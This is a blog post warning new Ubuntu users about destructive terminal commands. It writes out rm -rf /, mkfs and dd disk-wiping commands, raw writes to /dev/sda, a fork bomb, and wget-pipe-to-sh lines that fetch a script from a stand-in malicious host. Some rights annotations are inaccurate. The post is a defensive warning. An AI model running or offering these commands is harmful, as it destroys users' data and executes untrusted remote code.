IT News & Technology update

Provide comprehensive update related to Computer, technology, software, anti virus and another electric device

Malicious Commands You Should NOT Run in Ubuntu!

Written by IT News on 6:07 PM

I knew this was going to happen someday, as Ubuntu is more and more popular each day. It seems that there is a growing trend to offer malicious commands to new and inexperienced Ubuntu users on Ubuntu forums and not only there. Therefore I thought it would be a very smart idea to take a moment to review all these malicious commands, that you should NOT execute in a terminal.

The following commands can cause massive damage to your Ubuntu operating system! Please DO NOT execute any of them, just read and learn!

CODE:
sudo rm -rf / (This will delete all your files on your system) - Needs administrator rights! sudo rm -rf . (This will delete the current directory your in) - Needs administrator rights! sudo rm -rf * (This will delete all the files in the current folder) - Needs administrator rights! rm -rf * or rm -rf *.* (This will delete all the files in the current folder) - No administrator rights needed! rm -rf ~ / & (This will destroy your home directory) - No administrator rights needed!

All the below commands will erase your hard drive! CODE:
sudo mkfs (This will format your hard drive) - Needs administrator rights!
sudo mkfs.ext3 (This will format your hard drive) - Needs administrator rights!
sudo mkfs.bfs (This will format your hard drive) - Needs administrator rights!
sudo mkfs.cramfs (This will format your hard drive) - No administrator rights needed!
sudo mkfs.ext2 (This will format your hard drive) - Needs administrator rights!
sudo mkfs.minix (This will format your hard drive) - Needs administrator rights!
sudo mkfs.msdos (This will format your hard drive) - Needs administrator rights!
sudo mkfs.reiserfs (This will format your hard drive) - Needs administrator rights!
sudo mkfs.vfat (This will format your hard drive) - Needs administrator rights!

The dd command can be very dangerous, especially when you have no idea what it does! Below are some examples, but remember that these can vary often! CODE:
sudo dd if=/dev/zero of=/dev/hda (VERY DANGEROUS COMMAND! It will zero out the whole primary IDE hard drive) (Needs administrator rights)
sudo dd if=/dev/hda of=/dev/hdb (Needs administrator rights)
sudo dd if=something of=/dev/hda (Needs administrator rights)

WARNING: /dev/hda and /dev/hdb from the above example can be replaced with /dev/sda or /dev/sdb or any partition or hard drive you may have on your system!

Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data!

CODE:
any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: It is a malicious script that will execute a huge number of processes until your system freezes, forcing you to do a hard reboot which may cause data corruption or data damage.

The below command looks really intriguing and curiosity may lead new and inexperienced users to execute it! DON'T EXECUTE THEM!

CODE:
:(){:|:&};:

CODE:
fork while fork

Tarbomb: Let's say that someone who wants to help you, offers you a tar.gz or tar.bz2 archive and he asks you to extract it into an existing directory. This archive can be crafted to explode into a million of files, or inject other existing files into the system by guessing their filenames. You should make the habit of decompressing tar.gz or tar.bz2 archives inside a newly created directory!

Decompression bomb: Here's another example. Let's say someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of Gigabites, filling your hard drive until it freezes! You should not touch data from an untrusted source!

Shellscript: This one is also very dangrous! Someone gives you a link to download, to a shellscript and then he asks you to execute it. This script can contain any command he chooses (from the above examples). Do not execute code from people you don't trust! Here are some examples:

CODE:
wget http://some_place/some_file
sh ./some_file

Example: wget http://hax018r.org/malicious-script
sh ./malicious-script

or

CODE:
wget http://some_place/some_file -O- | sh
Example: wget http://hax018r.org/malicious-script -O- | sh
WARNING: Remember that the above examples can have any name!

Related Posts by Categories



Widget by Hoctro | Jack Book
  1. 0 comments: Responses to “ Malicious Commands You Should NOT Run in Ubuntu! ”

Search This Blog

Ads and Sponsored by:



Want to subscribe?

Subscribe in a reader.